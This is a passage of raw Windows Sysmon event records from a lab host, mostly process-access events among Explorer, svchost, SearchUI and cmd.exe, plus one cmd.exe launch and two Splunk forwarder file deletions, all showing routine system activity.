12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43566332C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+d6d17|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+167aaf 154100x800000000000000011299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.607{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.578{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.578{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.422{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB7A1396B7E5B9A1EA7E37A40CC4ED96,SHA256=83378F0B7D4E68D89507A9FF623B389BDEDE4ABCBDDE2D0822B7CEBD83097AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.422{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1894F7AAFE4F1F9AA8F6DC93D02D3F71,SHA256=40BB6FBFCB68B8FA35DCDC0F2DBDEC66F9CA1FB8776E0DB62C0877A868982778,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 